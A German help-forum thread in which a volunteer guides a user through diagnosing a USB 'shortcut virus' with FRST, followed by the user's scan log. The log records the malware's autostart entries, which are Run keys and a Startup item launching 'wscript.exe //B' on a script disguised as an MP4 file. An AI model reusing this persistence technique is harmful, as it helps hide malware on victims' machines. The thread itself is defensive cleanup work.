Nur Verknüpfungen auf USB-Stick

Buggerns · 09.04.2016, 15:56

Sehr geehrtes Forum,

ich habe ein Problem, das hier öfter geschildert wird und hoffe ebenfalls auf euren Beistand. Ich habe einem Freund vor 3 Tagen Dateien auf einen USB-Stick kopiert, wobei wir uns schon wunderten warum alle seine Dateien und Ordner nur als Verknüpfungen erschienen, obwohl der Stick der tatsächlichen Dateigröße entsprechend voll war. Dabei hat er anscheinend meinen PC mit schrecklichen Dingen infiziert, denn ein heute angeschlossener USB-Stick von mir ziegt nun auch nur noch Verknüpfungen.

adwcleaner habe ich laufen lassen, der fand ein paar Sachen, die ich löschte, doch seit dem folgenden Neustart ist meine Auflösung total verhauen (keine 16:10-Formate mehr wählbar). Nach einer gewissen Zeit "flimmert" das Bild und verschiebt sich in dünnen Strefen quer über den Bildschirm.

Malwarebytes Anti-Malware fand 3mal Nicht-Malware, Avira fand auch ein paar Sachen, das Problem besteht jedoch weiterhin.

Ich wäre für jede Hilfe unendlich dankbar!

Beste Grüße

Bugger

deeprybka · 09.04.2016, 16:21

Mein Name ist Jürgen und ich werde Dir bei Deinem Problem behilflich sein. Zusammen schaffen wir das...

Bitte arbeite alle Schritte der Reihe nach ab.
Lies die Anleitungen sorgfältig durch bevor Du beginnst. Wenn es Probleme gibt oder Du etwas nicht verstehst, dann stoppe mit Deiner Ausführung und beschreibe mir das Problem.
Führe bitte nur Scans durch, zu denen Du von mir aufgefordert wurdest.
Bitte kein Crossposting (posten in mehreren Foren).
Installiere oder deinstalliere während der Bereinigung keine Software, außer Du wurdest dazu aufgefordert.
Speichere alle unsere Tools auf dem Desktop ab. Link: So ladet Ihr unsere Tools richtig
Poste die Logfiles direkt in Deinen Thread in Code-Tags.
Bedenke, dass wir hier alle während unserer Freizeit tätig sind, wenn du innerhalb von 24 Stunden nichts von mir liest, dann schreibe mir bitte eine PM.

Hinweis:
Ich kann Dir niemals eine Garantie geben, dass wir alle schädlichen Dateien finden werden.
Eine Formatierung ist meist der schnellere und immer der sicherste Weg, aber auch nur bei wirklicher Malware empfehlenswert.
Adware & Co. können wir sehr gut entfernen.
Solltest Du Dich für eine Bereinigung entscheiden, arbeite solange mit, bis Du mein clean bekommst.

Los geht's:

Schritt 1

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:

FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)

Starte jetzt FRST.
Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

Lesestoff
Posten in CODE-Tags: So gehts...
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert uns massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

Buggerns · 09.04.2016, 16:49

Zu allererst, vielen Dank für die schnelle Antwort, Jürgen!

Habe leider Crossposting betrieben, bin aber bisher keiner anderen Hilfe gefolgt. Hier der Link zum anderen Forum. Wie gesagt, ich habe nichts dort angegebenes heruntergeladen oder angewandt.

Aber ich bin Deinen Anweisungen gefolgt, hier die Logs:

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
durchgeführt von Ben (Administrator) auf HAL (09-04-2016 17:40:03)
Gestartet von C:\Users\Ben\Desktop
Geladene Profile: Ben (Verfügbare Profile: Ben)
Platform: Windows 7 Professional Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Sidebar\sidebar.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Google Inc.) C:\Users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\THX TruStudio\THXNBSet\THXAudNB.exe
(OpenOffice.org) C:\Program Files (x86)\OpenOffice.org 3\program\soffice.exe
(Google Inc.) C:\Users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe
() C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(OpenOffice.org) C:\Program Files (x86)\OpenOffice.org 3\program\soffice.bin
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Wondershare) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wscript.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wscript.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\MOM.exe
(Google Inc.) C:\Users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe
(Disc Soft Ltd) C:\Program Files (x86)\DAEMON Tools Lite\DTShellHlp.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\CCC.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11855976 2011-05-18] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM-x32\...\Run: [THX TruStudio NB Settings] => C:\Program Files (x86)\Creative\THX TruStudio\THXNBSet\THXAudNB.exe [909824 2011-05-19] (Creative Technology Ltd)
HKLM-x32\...\Run: [UpdReg] => C:\Windows\UpdReg.EXE
HKLM-x32\...\Run: [DivXUpdate] => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1259376 2011-07-29] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59240 2012-02-20] (Apple Inc.)
HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [527864 2012-12-10] (Cisco Systems, Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [807392 2016-03-11] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-07-28] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [66328 2016-01-27] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1994752 2014-02-20] (Wondershare)
HKLM-x32\...\Run: [VID-20151943-WA0114] => wscript.exe //B "C:\Users\Ben\AppData\Local\Temp\VID-20151943-WA0114.MP4.js" <===== ACHTUNG
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Run: [ASRockXTU] => [X]
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Run: [zASRockInstantBoot] => [X]
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Run: [Google Update] => C:\Users\Ben\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc.)
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3672640 2013-03-14] (Disc Soft Ltd)
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3077712 2016-03-31] (Valve Corporation)
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Run: [GoogleChromeAutoLaunch_8B4B86C2A5661DC92D9A84E265233F91] => C:\Users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe [874136 2016-03-27] (Google Inc.)
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Run: [VID-20151943-WA0114] => wscript.exe //B "C:\Users\Ben\AppData\Local\Temp\VID-20151943-WA0114.MP4.js" <===== ACHTUNG
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\MountPoints2: N - N:\Setup.exe
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\MountPoints2: {5def52b4-9f84-11e2-8586-002522ff397d} - L:\setup.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk [2013-04-17]
ShortcutTarget: Adobe Gamma.lnk -> C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
Startup: C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OpenOffice.org 3.3.lnk [2012-03-16]
ShortcutTarget: OpenOffice.org 3.3.lnk -> C:\Program Files (x86)\OpenOffice.org 3\program\quickstart.exe ()
Startup: C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID-20151943-WA0114.MP4.js [2015-09-10] ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{9AC5FAFD-36B5-46D0-995A-B1A01FC0C8D9}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{D06532B5-E6AF-47BB-AB3E-470FFE525DD7}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files (x86)\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll [2011-12-12] (DivX, LLC)
BHO-x32: Kein Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> Keine Datei
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll => Keine Datei

FireFox:
========
FF ProfilePath: C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default
FF Homepage: hxxps://mail.google.com/
FF Session Restore: -> ist aktiviert.
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll [2011-06-20] (DivX, LLC.)
FF Plugin: @java.com/DTPlugin,version=10.9.2 -> C:\Windows\system32\npDeployJava1.dll [2012-11-05] (Oracle Corporation)
FF Plugin-x32: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll [2011-12-13] (DivX, LLC)
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll [2011-06-20] (DivX, LLC.)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=1.6.0_37 -> C:\Windows\SysWOW64\npdeployJava1.dll [2012-09-24] (Sun Microsystems, Inc.)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1744302370-2936264581-3152195107-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-1744302370-2936264581-3152195107-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-1744302370-2936264581-3152195107-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Ben\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-06-08] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\searchplugins\filestube.xml [2013-02-26]
FF SearchPlugin: C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\searchplugins\youtube-video-search.xml [2016-01-13]
FF SearchPlugin: C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\searchplugins\youtube-videosuche.xml [2012-02-09]
FF Extension: DivX Web Player - C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\Extensions\DivXWebPlayer@divx.com.xpi [2012-02-18] [ist nicht signiert]
FF Extension: Firebug - C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\Extensions\firebug@software.joehewitt.com.xpi [2016-03-31]
FF Extension: ZenMate Security, Privacy & Unblock VPN - C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\Extensions\firefox@zenmate.com.xpi [2016-03-02]
FF Extension: Zotero - C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\Extensions\zotero@chnm.gmu.edu [2012-12-22] [ist nicht signiert]
FF Extension: Adblock Plus - C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-02-23]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2016-04-09] [ist nicht signiert]
FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5
FF Extension: DivX Plus Web Player HTML5 &video& - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2012-02-21] [ist nicht signiert]

Chrome: 
=======
CHR Plugin: (Native Client) - C:\Users\Ben\AppData\Local\Google\Chrome\Application\49.0.2623.110\ppGoogleNaClPluginChrome.dll => Keine Datei
CHR Plugin: (Chrome PDF Viewer) - C:\Users\Ben\AppData\Local\Google\Chrome\Application\49.0.2623.110\pdf.dll => Keine Datei
CHR Plugin: (Shockwave Flash) - C:\Users\Ben\AppData\Local\Google\Chrome\Application\49.0.2623.110\gcswf32.dll => Keine Datei
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll => Keine Datei
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => Keine Datei
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (DivX Plus Web Player) - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => Keine Datei
CHR Plugin: (Java(TM) Platform SE 6 U33) - C:\Program Files (x86)\Java\jre6\bin\plugin2\npjp2.dll => Keine Datei
CHR Plugin: (Java Deployment Toolkit 6.0.330.3) - C:\Windows\SysWOW64\npdeployJava1.dll (Sun Microsystems, Inc.)
CHR Plugin: (Pando Web Plugin) - C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll => Keine Datei
CHR Plugin: (VLC Web Plugin) - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Profile: C:\Users\Ben\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Adblock Plus) - C:\Users\Ben\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-03-09]
CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\Ben\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2016-03-09]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Ben\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-09]
CHR Extension: (Mehr Leistung und Videoformate für dein HTML5 <video>) - C:\Users\Ben\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm [2015-07-26]
CHR HKLM-x32\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files (x86)\DivX\DivX Plus Web Player\chrome\DivXHTML5\DivXHTML5.crx [2011-12-12]
StartMenuInternet: Google Chrome.53QMR6CZC4UNUZZHKCZYJRUEPU - C:\Users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2013-04-17] (Adobe Systems) [Datei ist nicht signiert]
R2 AMD FUEL Service; C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe [344064 2015-07-28] (Advanced Micro Devices, Inc.) [Datei ist nicht signiert]
S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [955736 2016-03-11] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [466504 2016-03-11] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [466504 2016-03-11] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1424880 2016-03-11] (Avira Operations GmbH & Co. KG)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [260456 2016-01-27] (Avira Operations GmbH & Co. KG)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AODDriver4.3; C:\Program Files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [154816 2016-03-11] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [133168 2016-03-11] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2015-07-26] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\System32\DRIVERS\avnetflt.sys [69888 2016-03-11] (Avira Operations GmbH & Co. KG)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2013-04-14] (DT Soft Ltd)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [564792 2012-02-08] (Duplex Secure Ltd.)
S2 AODDriver4.01; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-09 17:40 - 2016-04-09 17:40 - 00019305 _____ C:\Users\Ben\Desktop\FRST.txt
2016-04-09 17:37 - 2016-04-09 17:39 - 00047362 _____ C:\Users\Ben\Downloads\Addition.txt
2016-04-09 17:36 - 2016-04-09 17:40 - 00000000 ____D C:\FRST
2016-04-09 17:36 - 2016-04-09 17:39 - 00033078 _____ C:\Users\Ben\Downloads\FRST.txt
2016-04-09 17:36 - 2016-04-09 17:36 - 02374144 _____ (Farbar) C:\Users\Ben\Desktop\FRST64.exe
2016-04-09 15:57 - 2016-04-09 15:57 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Ben\Downloads\revosetup95.exe
2016-04-09 15:57 - 2016-04-09 15:57 - 00000000 ____D C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2016-04-09 15:57 - 2016-04-09 15:57 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2016-04-09 15:15 - 2016-04-09 15:15 - 03119168 _____ C:\Users\Ben\Downloads\adwcleaner_5.109.exe
2016-04-09 13:53 - 2016-04-09 13:53 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-04-08 19:36 - 2016-04-08 19:59 - 00000000 ____D C:\Users\Ben\Downloads\The Big Bang Theory S09E20 1080p HDTV X264-DIMENSION
2016-04-05 21:52 - 2016-04-05 23:52 - 00000000 ____D C:\Users\Ben\Downloads\Shameless US S06E12 1080p HDTV X264-DIMENSION
2016-04-04 22:19 - 2016-04-04 23:28 - 00000000 ____D C:\Users\Ben\Downloads\The Walking Dead S06E16 1080p WEB-DL DD5 1 H 264-Cyphanix
2016-04-02 09:47 - 2016-04-07 00:13 - 00000000 ____D C:\Users\Ben\Downloads\plntaps201472yfy
2016-04-02 09:46 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plantaps201172yfy
2016-04-02 09:45 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps200172yfy
2016-04-02 09:44 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps197372yfy
2016-04-02 09:43 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps197272yfy
2016-04-02 09:42 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps197172yfy
2016-04-02 05:24 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps1970720yfy
2016-04-01 23:30 - 2016-04-07 00:14 - 00000000 ____D C:\Users\Ben\Downloads\plntaps196872yfy
2016-04-01 19:49 - 2016-04-01 20:21 - 00000000 ____D C:\Users\Ben\Downloads\The Big Bang Theory S09E19 1080p HDTV X264-DIMENSION
2016-03-30 23:40 - 2016-03-31 01:32 - 00000000 ____D C:\Users\Ben\Downloads\New Girl S05E13 1080p WEB-DL DD5 1 H 264-NTb
2016-03-30 23:15 - 2016-03-30 23:16 - 00000000 ____D C:\Users\Ben\Downloads\01 Khavn featuring Bing Austria - Ruined Heart
2016-03-29 01:25 - 2016-03-29 02:14 - 00000000 ____D C:\Users\Ben\Downloads\Shameless US S06E11 1080p HDTV X264-DIMENSION
2016-03-28 23:49 - 2016-03-29 00:53 - 00000000 ____D C:\Users\Ben\Downloads\The Walking Dead S06E15 1080p HDTV x264-CRAVERS
2016-03-27 23:15 - 2016-04-05 20:03 - 00000000 ____D C:\Users\Ben\Downloads\Hazel O'Connor - Breaking Glass
2016-03-26 02:58 - 2016-03-26 07:40 - 00000000 ____D C:\Users\Ben\Downloads\The Hateful Eight 2015 1080p BluRay x264-SPARKS
2016-03-24 22:58 - 2016-03-25 00:53 - 00000000 ____D C:\Users\Ben\Downloads\The Lobster 2015 720p BRRip X264 AC3-PLAYNOW
2016-03-24 00:25 - 2016-03-24 00:34 - 00000000 ____D C:\Users\Ben\Downloads\New Girl S05E12 720p HDTV x264-FLEET
2016-03-21 22:43 - 2016-03-22 02:01 - 00000000 ____D C:\Users\Ben\Downloads\Shameless US S06E10 1080p HDTV X264-DIMENSION
